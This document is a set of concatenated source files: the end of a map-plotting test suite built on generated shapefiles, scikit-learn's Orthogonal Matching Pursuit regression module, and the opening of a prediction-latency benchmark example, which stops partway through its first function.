            shp.point(px, py)
            shp.record('point%d' % number)
def _polygon_file(test_file):
    """Write a shapefile with a rectangle and a triangle to *test_file*."""
    named_rings = [
        ('polygon1', [[.25, -.25], [.25, .25], [.75, .25], [.75, -.25]]),
        ('polygon2', [[.25, .75], [.75, .75], [.5, 1.25]]),
    ]
    with shapefile.Writer(test_file, shapefile.POLYGON) as shp:
        shp.field('name', 'C')
        for name, ring in named_rings:
            shp.poly([ring])
            shp.record(name)
def _polyline_file(test_file):
    """Write a single zig-zag polyline shapefile to *test_file*."""
    n = 5
    # x advances in pairs, y alternates between two levels -> square wave.
    xs = np.repeat(np.linspace(0, 1, n), 2)
    ys = np.tile([0.375, 0.625], n)
    vertices = list(zip(xs, ys))
    with shapefile.Writer(test_file, shapefile.POLYLINE) as shp:
        shp.field('name', 'C')
        shp.line([vertices])
        shp.record('line1')
def _polylinem_file(test_file):
    """Write a measured polyline (two 5-vertex parts) shapefile."""
    n = 5
    xs = np.repeat(np.linspace(0, 1, n), 2)
    ys = np.tile([0.375, 0.625], n) + 1  # shifted up one unit
    vertices = list(zip(xs, ys))
    with shapefile.Writer(test_file, shapefile.POLYLINEM) as shp:
        shp.field('name', 'C')
        # Split the zig-zag into two parts of five vertices each.
        shp.linem([vertices[:5], vertices[5:]])
        shp.record('linem1')
def test_geometries(tmpdir):
    """All supported shapefile geometry types render on a single map."""
    writers = (
        ('point', _point_file),
        ('polygon', _polygon_file),
        ('polyline', _polyline_file),
        ('polylinem', _polylinem_file),
    )
    frames = {}
    for stem, write_shapefile in writers:
        filename = '{}/test_file_{}.shp'.format(tmpdir, stem)
        write_shapefile(filename)
        frames[stem] = GeoDataFrame.from_file(filename)

    p = (ggplot()
         + aes(fill='geometry.bounds.miny')
         + geom_map(frames['polygon'])
         + geom_map(frames['point'], size=4)
         + geom_map(frames['polyline'], size=2)
         + geom_map(frames['polylinem'], size=2)
         + labs(fill='miny')
         )

    assert p + _theme == 'geometries'
def test_facet_wrap(tmpdir):
    """Polygons split into one facet per value of the 'shape' column."""
    shp_path = '{}/test_file_polygon.shp'.format(tmpdir)
    _polygon_file(shp_path)

    df = GeoDataFrame.from_file(shp_path)
    df['shape'] = ['rectangle', 'triangle']

    p = (ggplot()
         + aes(fill='geometry.bounds.miny')
         + geom_map(df)
         + facet_wrap('shape')
         + labs(fill='miny')
         )

    assert p + _theme == 'facet_wrap'
| gpl-2.0 |
B3AU/waveTree | sklearn/linear_model/omp.py | 3 | 31732 | """Orthogonal matching pursuit algorithms
"""
# Author: Vlad Niculae
#
# License: BSD 3 clause
import warnings
import numpy as np
from scipy import linalg
from scipy.linalg.lapack import get_lapack_funcs
from .base import LinearModel, _pre_fit
from ..base import RegressorMixin
from ..utils import array2d, as_float_array, check_arrays
from ..cross_validation import _check_cv as check_cv
from ..externals.joblib import Parallel, delayed
from ..utils.arrayfuncs import solve_triangular
# Warning text emitted when OMP stops early because the selected atoms became
# linearly dependent (see _cholesky_omp / _gram_omp).
premature = """ Orthogonal matching pursuit ended prematurely due to linear
dependence in the dictionary. The requested precision might not have been met.
"""
def _cholesky_omp(X, y, n_nonzero_coefs, tol=None, copy_X=True,
                  return_path=False):
    """Orthogonal Matching Pursuit step using the Cholesky decomposition.

    Parameters
    ----------
    X : array, shape (n_samples, n_features)
        Input dictionary. Columns are assumed to have unit norm.

    y : array, shape (n_samples,)
        Input targets

    n_nonzero_coefs : int
        Targeted number of non-zero elements

    tol : float
        Targeted squared error, if not None overrides n_nonzero_coefs.

    copy_X : bool, optional
        Whether the design matrix X must be copied by the algorithm. A false
        value is only helpful if X is already Fortran-ordered, otherwise a
        copy is made anyway.

    return_path : bool, optional. Default: False
        Whether to return every value of the nonzero coefficients along the
        forward path. Useful for cross-validation.

    Returns
    -------
    gamma : array, shape (n_nonzero_coefs,)
        Non-zero elements of the solution

    idx : array, shape (n_nonzero_coefs,)
        Indices of the positions of the elements in gamma within the solution
        vector

    coef : array, shape (n_features, n_nonzero_coefs)
        The first k values of column k correspond to the coefficient value
        for the active features at that step. The lower left triangle contains
        garbage. Only returned if ``return_path=True``.
    """
    if copy_X:
        X = X.copy('F')
    else:  # even if we are allowed to overwrite, still copy it if bad order
        X = np.asfortranarray(X)

    # Threshold below which inner products are treated as numerically zero.
    min_float = np.finfo(X.dtype).eps
    nrm2, swap = linalg.get_blas_funcs(('nrm2', 'swap'), (X,))
    potrs, = get_lapack_funcs(('potrs',), (X,))

    alpha = np.dot(X.T, y)  # correlation of each atom with the target
    residual = y
    gamma = np.empty(0)
    n_active = 0
    indices = np.arange(X.shape[1])  # keeping track of swapping

    max_features = X.shape[1] if tol is not None else n_nonzero_coefs
    # L holds the (growing) Cholesky factor of the active atoms' Gram matrix.
    L = np.empty((max_features, max_features), dtype=X.dtype)
    L[0, 0] = 1.
    if return_path:
        coefs = np.empty_like(L)

    while True:
        # Pick the atom most correlated with the current residual.
        lam = np.argmax(np.abs(np.dot(X.T, residual)))
        if lam < n_active or alpha[lam] ** 2 < min_float:
            # atom already selected or inner product too small
            warnings.warn(premature, RuntimeWarning, stacklevel=2)
            break
        if n_active > 0:
            # Updates the Cholesky decomposition of X' X
            L[n_active, :n_active] = np.dot(X[:, :n_active].T, X[:, lam])
            solve_triangular(L[:n_active, :n_active], L[n_active, :n_active])
            v = nrm2(L[n_active, :n_active]) ** 2
            if 1 - v <= min_float:  # selected atoms are dependent
                warnings.warn(premature, RuntimeWarning, stacklevel=2)
                break
            L[n_active, n_active] = np.sqrt(1 - v)
        # Move the chosen atom to the front of the active set (in place);
        # `indices` records the permutation so results map back to X's order.
        X.T[n_active], X.T[lam] = swap(X.T[n_active], X.T[lam])
        alpha[n_active], alpha[lam] = alpha[lam], alpha[n_active]
        indices[n_active], indices[lam] = indices[lam], indices[n_active]
        n_active += 1
        # solves LL'x = y as a composition of two triangular systems
        gamma, _ = potrs(L[:n_active, :n_active], alpha[:n_active], lower=True,
                         overwrite_b=False)
        if return_path:
            coefs[:n_active, n_active - 1] = gamma
        residual = y - np.dot(X[:, :n_active], gamma)
        if tol is not None and nrm2(residual) ** 2 <= tol:
            break
        elif n_active == max_features:
            break

    if return_path:
        return gamma, indices[:n_active], coefs[:, :n_active]
    else:
        return gamma, indices[:n_active]
def _gram_omp(Gram, Xy, n_nonzero_coefs, tol_0=None, tol=None,
              copy_Gram=True, copy_Xy=True, return_path=False):
    """Orthogonal Matching Pursuit step on a precomputed Gram matrix.

    This function uses the Cholesky decomposition method.

    Parameters
    ----------
    Gram : array, shape (n_features, n_features)
        Gram matrix of the input data matrix

    Xy : array, shape (n_features,)
        Input targets

    n_nonzero_coefs : int
        Targeted number of non-zero elements

    tol_0 : float
        Squared norm of y, required if tol is not None.

    tol : float
        Targeted squared error, if not None overrides n_nonzero_coefs.

    copy_Gram : bool, optional
        Whether the gram matrix must be copied by the algorithm. A false
        value is only helpful if it is already Fortran-ordered, otherwise a
        copy is made anyway.

    copy_Xy : bool, optional
        Whether the covariance vector Xy must be copied by the algorithm.
        If False, it may be overwritten.

    return_path : bool, optional. Default: False
        Whether to return every value of the nonzero coefficients along the
        forward path. Useful for cross-validation.

    Returns
    -------
    gamma : array, shape (n_nonzero_coefs,)
        Non-zero elements of the solution

    idx : array, shape (n_nonzero_coefs,)
        Indices of the positions of the elements in gamma within the solution
        vector

    coefs : array, shape (n_features, n_nonzero_coefs)
        The first k values of column k correspond to the coefficient value
        for the active features at that step. The lower left triangle contains
        garbage. Only returned if ``return_path=True``.
    """
    Gram = Gram.copy('F') if copy_Gram else np.asfortranarray(Gram)
    if copy_Xy:
        Xy = Xy.copy()

    min_float = np.finfo(Gram.dtype).eps
    nrm2, swap = linalg.get_blas_funcs(('nrm2', 'swap'), (Gram,))
    potrs, = get_lapack_funcs(('potrs',), (Gram,))

    indices = np.arange(len(Gram))  # keeping track of swapping
    alpha = Xy  # correlations with the (implicit) residual
    tol_curr = tol_0
    delta = 0
    gamma = np.empty(0)
    n_active = 0

    max_features = len(Gram) if tol is not None else n_nonzero_coefs
    # Growing Cholesky factor of the active sub-Gram matrix.
    L = np.empty((max_features, max_features), dtype=Gram.dtype)
    L[0, 0] = 1.
    if return_path:
        coefs = np.empty_like(L)

    while True:
        lam = np.argmax(np.abs(alpha))
        if lam < n_active or alpha[lam] ** 2 < min_float:
            # selected same atom twice, or inner product too small
            warnings.warn(premature, RuntimeWarning, stacklevel=2)
            break
        if n_active > 0:
            L[n_active, :n_active] = Gram[lam, :n_active]
            solve_triangular(L[:n_active, :n_active], L[n_active, :n_active])
            v = nrm2(L[n_active, :n_active]) ** 2
            if 1 - v <= min_float:  # selected atoms are dependent
                warnings.warn(premature, RuntimeWarning, stacklevel=2)
                break
            L[n_active, n_active] = np.sqrt(1 - v)
        # Swap rows AND columns of Gram so the active set occupies the front.
        Gram[n_active], Gram[lam] = swap(Gram[n_active], Gram[lam])
        Gram.T[n_active], Gram.T[lam] = swap(Gram.T[n_active], Gram.T[lam])
        indices[n_active], indices[lam] = indices[lam], indices[n_active]
        Xy[n_active], Xy[lam] = Xy[lam], Xy[n_active]
        n_active += 1
        # solves LL'x = y as a composition of two triangular systems
        gamma, _ = potrs(L[:n_active, :n_active], Xy[:n_active], lower=True,
                         overwrite_b=False)
        if return_path:
            coefs[:n_active, n_active - 1] = gamma
        beta = np.dot(Gram[:, :n_active], gamma)
        alpha = Xy - beta
        if tol is not None:
            # Incremental update of the residual's squared norm.
            tol_curr += delta
            delta = np.inner(gamma, beta[:n_active])
            tol_curr -= delta
            if tol_curr <= tol:
                break
        elif n_active == max_features:
            break

    if return_path:
        return gamma, indices[:n_active], coefs[:, :n_active]
    else:
        return gamma, indices[:n_active]
def orthogonal_mp(X, y, n_nonzero_coefs=None, tol=None, precompute=False,
                  copy_X=True, return_path=False, precompute_gram=None):
    """Orthogonal Matching Pursuit (OMP)

    Solves n_targets Orthogonal Matching Pursuit problems.
    An instance of the problem has the form:

    When parametrized by the number of non-zero coefficients using
    `n_nonzero_coefs`:
    argmin ||y - X\gamma||^2 subject to ||\gamma||_0 <= n_{nonzero coefs}

    When parametrized by error using the parameter `tol`:
    argmin ||\gamma||_0 subject to ||y - X\gamma||^2 <= tol

    Parameters
    ----------
    X: array, shape (n_samples, n_features)
        Input data. Columns are assumed to have unit norm.

    y: array, shape (n_samples,) or (n_samples, n_targets)
        Input targets

    n_nonzero_coefs: int
        Desired number of non-zero entries in the solution. If None (by
        default) this value is set to 10% of n_features.

    tol: float
        Maximum norm of the residual. If not None, overrides n_nonzero_coefs.

    precompute: {True, False, 'auto'},
        Whether to perform precomputations. Improves performance when n_targets
        or n_samples is very large.

    copy_X: bool, optional
        Whether the design matrix X must be copied by the algorithm. A false
        value is only helpful if X is already Fortran-ordered, otherwise a
        copy is made anyway.

    return_path: bool, optional. Default: False
        Whether to return every value of the nonzero coefficients along the
        forward path. Useful for cross-validation.

    Returns
    -------
    coef: array, shape (n_features,) or (n_features, n_targets)
        Coefficients of the OMP solution. If `return_path=True`, this contains
        the whole coefficient path. In this case its shape is
        (n_features, n_features) or (n_features, n_targets, n_features) and
        iterating over the last axis yields coefficients in increasing order
        of active features.

    See also
    --------
    OrthogonalMatchingPursuit
    orthogonal_mp_gram
    lars_path
    decomposition.sparse_encode

    Notes
    -----
    Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
    Matching pursuits with time-frequency dictionaries, IEEE Transactions on
    Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
    (http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)

    This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
    M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
    Matching Pursuit Technical Report - CS Technion, April 2008.
    http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
    """
    # Backwards-compatibility shim for the deprecated keyword name.
    if precompute_gram is not None:
        warnings.warn("precompute_gram will be removed in 0.15."
                      " Use the precompute parameter.",
                      DeprecationWarning, stacklevel=2)
        precompute = precompute_gram
    del precompute_gram
    X = array2d(X, order='F', copy=copy_X)
    copy_X = False
    y = np.asarray(y)
    if y.ndim == 1:
        y = y[:, np.newaxis]
    if y.shape[1] > 1:  # subsequent targets will be affected
        copy_X = True
    if n_nonzero_coefs is None and tol is None:
        # default for n_nonzero_coefs is 0.1 * n_features
        # but at least one.
        n_nonzero_coefs = max(int(0.1 * X.shape[1]), 1)
    if tol is not None and tol < 0:
        raise ValueError("Epsilon cannot be negative")
    if tol is None and n_nonzero_coefs <= 0:
        raise ValueError("The number of atoms must be positive")
    if tol is None and n_nonzero_coefs > X.shape[1]:
        raise ValueError("The number of atoms cannot be more than the number "
                         "of features")
    if precompute == 'auto':
        precompute = X.shape[0] > X.shape[1]
    if precompute:
        # Delegate to the Gram variant after precomputing X'X and X'y.
        G = np.dot(X.T, X)
        G = np.asfortranarray(G)
        Xy = np.dot(X.T, y)
        if tol is not None:
            norms_squared = np.sum((y ** 2), axis=0)
        else:
            norms_squared = None
        return orthogonal_mp_gram(G, Xy, n_nonzero_coefs, tol, norms_squared,
                                  copy_Gram=copy_X, copy_Xy=False)

    if return_path:
        coef = np.zeros((X.shape[1], y.shape[1], X.shape[1]))
    else:
        coef = np.zeros((X.shape[1], y.shape[1]))
    # One independent OMP problem per target column.
    for k in range(y.shape[1]):
        out = _cholesky_omp(X, y[:, k], n_nonzero_coefs, tol,
                            copy_X=copy_X, return_path=return_path)
        if return_path:
            _, idx, coefs = out
            coef = coef[:, :, :len(idx)]
            # Scatter the path coefficients back to the original atom order.
            for n_active, x in enumerate(coefs.T):
                coef[idx[:n_active + 1], k, n_active] = x[:n_active + 1]
        else:
            x, idx = out
            coef[idx, k] = x
    return np.squeeze(coef)
def orthogonal_mp_gram(Gram, Xy, n_nonzero_coefs=None, tol=None,
                       norms_squared=None, copy_Gram=True,
                       copy_Xy=True, return_path=False):
    """Gram Orthogonal Matching Pursuit (OMP)

    Solves n_targets Orthogonal Matching Pursuit problems using only
    the Gram matrix X.T * X and the product X.T * y.

    Parameters
    ----------
    Gram: array, shape (n_features, n_features)
        Gram matrix of the input data: X.T * X

    Xy: array, shape (n_features,) or (n_features, n_targets)
        Input targets multiplied by X: X.T * y

    n_nonzero_coefs: int
        Desired number of non-zero entries in the solution. If None (by
        default) this value is set to 10% of n_features.

    tol: float
        Maximum norm of the residual. If not None, overrides n_nonzero_coefs.

    norms_squared: array-like, shape (n_targets,)
        Squared L2 norms of the lines of y. Required if tol is not None.

    copy_Gram: bool, optional
        Whether the gram matrix must be copied by the algorithm. A false
        value is only helpful if it is already Fortran-ordered, otherwise a
        copy is made anyway.

    copy_Xy: bool, optional
        Whether the covariance vector Xy must be copied by the algorithm.
        If False, it may be overwritten.

    return_path: bool, optional. Default: False
        Whether to return every value of the nonzero coefficients along the
        forward path. Useful for cross-validation.

    Returns
    -------
    coef: array, shape (n_features,) or (n_features, n_targets)
        Coefficients of the OMP solution. If `return_path=True`, this contains
        the whole coefficient path. In this case its shape is
        (n_features, n_features) or (n_features, n_targets, n_features) and
        iterating over the last axis yields coefficients in increasing order
        of active features.

    See also
    --------
    OrthogonalMatchingPursuit
    orthogonal_mp
    lars_path
    decomposition.sparse_encode

    Notes
    -----
    Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
    Matching pursuits with time-frequency dictionaries, IEEE Transactions on
    Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
    (http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)

    This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
    M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
    Matching Pursuit Technical Report - CS Technion, April 2008.
    http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
    """
    Gram = array2d(Gram, order='F', copy=copy_Gram)
    Xy = np.asarray(Xy)
    if Xy.ndim > 1 and Xy.shape[1] > 1:
        # or subsequent target will be affected
        copy_Gram = True
    if Xy.ndim == 1:
        # Normalize the single-target case to 2-d / list form.
        Xy = Xy[:, np.newaxis]
        if tol is not None:
            norms_squared = [norms_squared]

    if n_nonzero_coefs is None and tol is None:
        n_nonzero_coefs = int(0.1 * len(Gram))
    if tol is not None and norms_squared is None:
        raise ValueError('Gram OMP needs the precomputed norms in order '
                         'to evaluate the error sum of squares.')
    if tol is not None and tol < 0:
        raise ValueError("Epsilon cannot be negative")
    if tol is None and n_nonzero_coefs <= 0:
        raise ValueError("The number of atoms must be positive")
    if tol is None and n_nonzero_coefs > len(Gram):
        raise ValueError("The number of atoms cannot be more than the number "
                         "of features")

    if return_path:
        coef = np.zeros((len(Gram), Xy.shape[1], len(Gram)))
    else:
        coef = np.zeros((len(Gram), Xy.shape[1]))

    # One independent OMP problem per target column.
    for k in range(Xy.shape[1]):
        out = _gram_omp(Gram, Xy[:, k], n_nonzero_coefs,
                        norms_squared[k] if tol is not None else None, tol,
                        copy_Gram=copy_Gram, copy_Xy=copy_Xy,
                        return_path=return_path)
        if return_path:
            _, idx, coefs = out
            coef = coef[:, :, :len(idx)]
            # Scatter the path coefficients back to the original atom order.
            for n_active, x in enumerate(coefs.T):
                coef[idx[:n_active + 1], k, n_active] = x[:n_active + 1]
        else:
            x, idx = out
            coef[idx, k] = x
    return np.squeeze(coef)
class OrthogonalMatchingPursuit(LinearModel, RegressorMixin):
    """Orthogonal Matching Pursuit model (OMP)

    Parameters
    ----------
    n_nonzero_coefs : int, optional
        Desired number of non-zero entries in the solution. If None (by
        default) this value is set to 10% of n_features.

    tol : float, optional
        Maximum norm of the residual. If not None, overrides n_nonzero_coefs.

    fit_intercept : boolean, optional
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    normalize : boolean, optional
        If False, the regressors X are assumed to be already normalized.

    precompute : {True, False, 'auto'}, default 'auto'
        Whether to use a precomputed Gram and Xy matrix to speed up
        calculations. Improves performance when `n_targets` or `n_samples` is
        very large. Note that if you already have such matrices, you can pass
        them directly to the fit method.

    copy_X : bool, optional
        Whether the design matrix X must be copied by the algorithm. A false
        value is only helpful if X is already Fortran-ordered, otherwise a
        copy is made anyway.
        WARNING : will be deprecated in 0.15

    copy_Gram : bool, optional
        Whether the gram matrix must be copied by the algorithm. A false
        value is only helpful if X is already Fortran-ordered, otherwise a
        copy is made anyway.
        WARNING : will be deprecated in 0.15

    copy_Xy : bool, optional
        Whether the covariance vector Xy must be copied by the algorithm.
        If False, it may be overwritten.
        WARNING : will be deprecated in 0.15

    Attributes
    ----------
    `coef_` : array, shape (n_features,) or (n_features, n_targets)
        parameter vector (w in the formula)

    `intercept_` : float or array, shape (n_targets,)
        independent term in decision function.

    Notes
    -----
    Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
    Matching pursuits with time-frequency dictionaries, IEEE Transactions on
    Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
    (http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)

    This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
    M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
    Matching Pursuit Technical Report - CS Technion, April 2008.
    http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf

    See also
    --------
    orthogonal_mp
    orthogonal_mp_gram
    lars_path
    Lars
    LassoLars
    decomposition.sparse_encode
    """
    def __init__(self, copy_X=None, copy_Gram=None, copy_Xy=None,
                 n_nonzero_coefs=None, tol=None, fit_intercept=True,
                 normalize=True, precompute='auto', precompute_gram=None):
        # The copy_* / precompute_gram parameters default to None so that
        # fit() can tell "not supplied" apart from an explicit value and
        # issue the appropriate deprecation warnings.
        self.n_nonzero_coefs = n_nonzero_coefs
        self.tol = tol
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.precompute = precompute
        self.precompute_gram = precompute_gram
        self.copy_Gram = copy_Gram
        self.copy_Xy = copy_Xy
        self.copy_X = copy_X

    def fit(self, X, y, Gram=None, Xy=None):
        """Fit the model using X, y as training data.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            Training data.

        y : array-like, shape (n_samples,) or (n_samples, n_targets)
            Target values.

        Gram : array-like, shape (n_features, n_features) (optional)
            Gram matrix of the input data: X.T * X
            WARNING : will be deprecated in 0.15

        Xy : array-like, shape (n_features,) or (n_features, n_targets)
            (optional)
            Input targets multiplied by X: X.T * y
            WARNING : will be deprecated in 0.15

        Returns
        -------
        self: object
            returns an instance of self.
        """
        X = array2d(X)
        y = np.asarray(y)
        n_features = X.shape[1]

        # ---- resolve deprecated constructor / fit arguments -------------
        if self.precompute_gram is not None:
            warnings.warn("precompute_gram will be removed in 0.15."
                          " Use the precompute parameter.",
                          DeprecationWarning, stacklevel=2)
            precompute = self.precompute_gram
        else:
            precompute = self.precompute

        if self.copy_Gram is not None:
            warnings.warn("copy_Gram will be removed in 0.15."
                          " Use the orthogonal_mp function for"
                          " low level memory control.",
                          DeprecationWarning, stacklevel=2)
            copy_Gram = self.copy_Gram
        else:
            copy_Gram = True

        if self.copy_Xy is not None:
            warnings.warn("copy_Xy will be removed in 0.15."
                          " Use the orthogonal_mp function for"
                          " low level memory control.",
                          DeprecationWarning, stacklevel=2)
            copy_Xy = self.copy_Xy
        else:
            copy_Xy = True

        if self.copy_X is not None:
            warnings.warn("copy_X will be removed in 0.15."
                          " Use the orthogonal_mp function for"
                          " low level memory control.",
                          DeprecationWarning, stacklevel=2)
            copy_X = self.copy_X
        else:
            copy_X = True

        if Gram is not None:
            warnings.warn("Gram will be removed in 0.15."
                          " Use the orthogonal_mp function for"
                          " low level memory control.",
                          DeprecationWarning, stacklevel=2)

        if Xy is not None:
            warnings.warn("Xy will be removed in 0.15."
                          " Use the orthogonal_mp function for"
                          " low level memory control.",
                          DeprecationWarning, stacklevel=2)

        # Precomputed matrices are incompatible with centering/normalizing;
        # drop them and recompute from scratch in that case.
        if (Gram is not None or Xy is not None) and (self.fit_intercept
                                                     or self.normalize):
            warnings.warn('Mean subtraction (fit_intercept) and normalization '
                          'cannot be applied on precomputed Gram and Xy '
                          'matrices. Your precomputed values are ignored and '
                          'recomputed. To avoid this, do the scaling yourself '
                          'and call with fit_intercept and normalize set to '
                          'False.', RuntimeWarning, stacklevel=2)
            Gram, Xy = None, None

        if Gram is not None:
            precompute = Gram
        if Xy is not None and copy_Xy:
            Xy = Xy.copy()

        X, y, X_mean, y_mean, X_std, Gram, Xy = \
            _pre_fit(X, y, Xy, precompute, self.normalize, self.fit_intercept,
                     copy=copy_X)

        if y.ndim == 1:
            y = y[:, np.newaxis]

        if self.n_nonzero_coefs is None and self.tol is None:
            # default for n_nonzero_coefs is 0.1 * n_features
            # but at least one.
            self.n_nonzero_coefs_ = max(int(0.1 * n_features), 1)
        else:
            self.n_nonzero_coefs_ = self.n_nonzero_coefs

        # Gram is False when _pre_fit decided not to precompute.
        if Gram is False:
            self.coef_ = orthogonal_mp(X, y, self.n_nonzero_coefs_, self.tol,
                                       precompute=False, copy_X=copy_X).T
        else:
            norms_sq = np.sum(y ** 2, axis=0) if self.tol is not None else None
            self.coef_ = orthogonal_mp_gram(Gram, Xy, self.n_nonzero_coefs_,
                                            self.tol, norms_sq,
                                            copy_Gram, True).T
        self._set_intercept(X_mean, y_mean, X_std)
        return self
def _omp_path_residues(X_train, y_train, X_test, y_test, copy=True,
                       fit_intercept=True, normalize=True, max_iter=100):
    """Compute the residues on left-out data for a full LARS path

    Parameters
    -----------
    X_train : array, shape (n_samples, n_features)
        The data to fit the LARS on

    y_train : array, shape (n_samples)
        The target variable to fit LARS on

    X_test : array, shape (n_samples, n_features)
        The data to compute the residues on

    y_test : array, shape (n_samples)
        The target variable to compute the residues on

    copy : boolean, optional
        Whether X_train, X_test, y_train and y_test should be copied. If
        False, they may be overwritten.

    fit_intercept : boolean
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    normalize : boolean, optional, default False
        If True, the regressors X will be normalized before regression.

    max_iter : integer, optional
        Maximum numbers of iterations to perform, therefore maximum features
        to include. 100 by default.

    Returns
    -------
    residues: array, shape (n_samples, max_features)
        Residues of the prediction on the test data
    """
    if copy:
        # The centering/normalization below is in-place; copy to protect
        # the caller's arrays.
        X_train = X_train.copy()
        y_train = y_train.copy()
        X_test = X_test.copy()
        y_test = y_test.copy()

    if fit_intercept:
        # Center both splits with the *training* statistics.
        X_mean = X_train.mean(axis=0)
        X_train -= X_mean
        X_test -= X_mean
        y_mean = y_train.mean(axis=0)
        y_train = as_float_array(y_train, copy=False)
        y_train -= y_mean
        y_test = as_float_array(y_test, copy=False)
        y_test -= y_mean

    if normalize:
        norms = np.sqrt(np.sum(X_train ** 2, axis=0))
        nonzeros = np.flatnonzero(norms)
        X_train[:, nonzeros] /= norms[nonzeros]

    coefs = orthogonal_mp(X_train, y_train, n_nonzero_coefs=max_iter, tol=None,
                          precompute=False, copy_X=False,
                          return_path=True)
    if coefs.ndim == 1:
        coefs = coefs[:, np.newaxis]
    if normalize:
        # Undo the column scaling so the coefficients apply to raw X_test.
        coefs[nonzeros] /= norms[nonzeros][:, np.newaxis]

    return np.dot(coefs.T, X_test.T) - y_test
class OrthogonalMatchingPursuitCV(LinearModel, RegressorMixin):
    """Cross-validated Orthogonal Matching Pursuit model (OMP)

    Parameters
    ----------
    copy : bool, optional
        Whether the design matrix X must be copied by the algorithm. A false
        value is only helpful if X is already Fortran-ordered, otherwise a
        copy is made anyway.

    fit_intercept : boolean, optional
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    normalize : boolean, optional
        If False, the regressors X are assumed to be already normalized.

    max_iter : integer, optional
        Maximum numbers of iterations to perform, therefore maximum features
        to include. 10% of ``n_features`` but at least 5 if available.

    cv : cross-validation generator, optional
        see :mod:`sklearn.cross_validation`. If ``None`` is passed, default to
        a 5-fold strategy

    n_jobs : integer, optional
        Number of CPUs to use during the cross validation. If ``-1``, use
        all the CPUs

    verbose : boolean or integer, optional
        Sets the verbosity amount

    Attributes
    ----------
    `n_nonzero_coefs_` : int
        Estimated number of non-zero coefficients giving the best mean
        squared error over the cross-validation folds.

    `coef_` : array, shape (n_features,) or (n_features, n_targets)
        parameter vector (w in the problem formulation).

    `intercept_` : float or array, shape (n_targets,)
        independent term in decision function.

    See also
    --------
    orthogonal_mp
    orthogonal_mp_gram
    lars_path
    Lars
    LassoLars
    OrthogonalMatchingPursuit
    LarsCV
    LassoLarsCV
    decomposition.sparse_encode
    """
    def __init__(self, copy=True, fit_intercept=True, normalize=True,
                 max_iter=None, cv=None, n_jobs=1, verbose=False):
        self.copy = copy
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.max_iter = max_iter
        self.cv = cv
        self.n_jobs = n_jobs
        self.verbose = verbose

    def fit(self, X, y):
        """Fit the model using X, y as training data.

        Parameters
        ----------
        X : array-like, shape [n_samples, n_features]
            Training data.

        y : array-like, shape [n_samples]
            Target values.

        Returns
        -------
        self : object
            returns an instance of self.
        """
        X = array2d(X)
        X, y = check_arrays(X, y)
        cv = check_cv(self.cv, X, y, classifier=False)
        # Default path length: 10% of n_features, clipped to [5, n_features].
        max_iter = (min(max(int(0.1 * X.shape[1]), 5), X.shape[1])
                    if not self.max_iter
                    else self.max_iter)
        # One full OMP path of test residues per CV fold, in parallel.
        cv_paths = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
            delayed(_omp_path_residues)(
                X[train], y[train], X[test], y[test], self.copy,
                self.fit_intercept, self.normalize, max_iter)
            for train, test in cv)

        # Folds may stop early; compare only the path prefix common to all.
        min_early_stop = min(fold.shape[0] for fold in cv_paths)
        mse_folds = np.array([(fold[:min_early_stop] ** 2).mean(axis=1)
                              for fold in cv_paths])
        best_n_nonzero_coefs = np.argmin(mse_folds.mean(axis=0)) + 1
        self.n_nonzero_coefs_ = best_n_nonzero_coefs
        # Refit on the full data with the selected sparsity level.
        omp = OrthogonalMatchingPursuit(n_nonzero_coefs=best_n_nonzero_coefs,
                                        copy_X=None,
                                        fit_intercept=self.fit_intercept,
                                        normalize=self.normalize)
        omp.fit(X, y)
        self.coef_ = omp.coef_
        self.intercept_ = omp.intercept_
        return self
| bsd-3-clause |
mwv/scikit-learn | examples/applications/plot_prediction_latency.py | 234 | 11277 | """
==================
Prediction Latency
==================
This is an example showing the prediction latency of various scikit-learn
estimators.
The goal is to measure the latency one can expect when doing predictions
either in bulk or atomic (i.e. one by one) mode.
The plots represent the distribution of the prediction latency as a boxplot.
"""
# Authors: Eustache Diemert <eustache@diemert.fr>
# License: BSD 3 clause
from __future__ import print_function
from collections import defaultdict
import time
import gc
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import scoreatpercentile
from sklearn.datasets.samples_generator import make_regression
from sklearn.ensemble.forest import RandomForestRegressor
from sklearn.linear_model.ridge import Ridge
from sklearn.linear_model.stochastic_gradient import SGDRegressor
from sklearn.svm.classes import SVR
def _not_in_sphinx():
# Hack to detect whether we are running by the sphinx builder
return '__file__' in globals()
def atomic_benchmark_estimator(estimator, X_test, verbose=False):
    """Measure the prediction runtime of each instance, one at a time.

    Parameters
    ----------
    estimator : fitted estimator supporting ``predict()``
    X_test : array, shape (n_instances, n_features)
        Test inputs; one ``predict`` call is timed per row.
    verbose : bool, optional
        When True, print min / median / max runtimes.

    Returns
    -------
    runtimes : np.ndarray of float64, shape (n_instances,)
        Per-instance prediction latency in seconds.
    """
    n_instances = X_test.shape[0]
    # BUG FIX: the np.float alias was removed in NumPy 1.24; the builtin
    # float produces the same float64 dtype on every NumPy version.
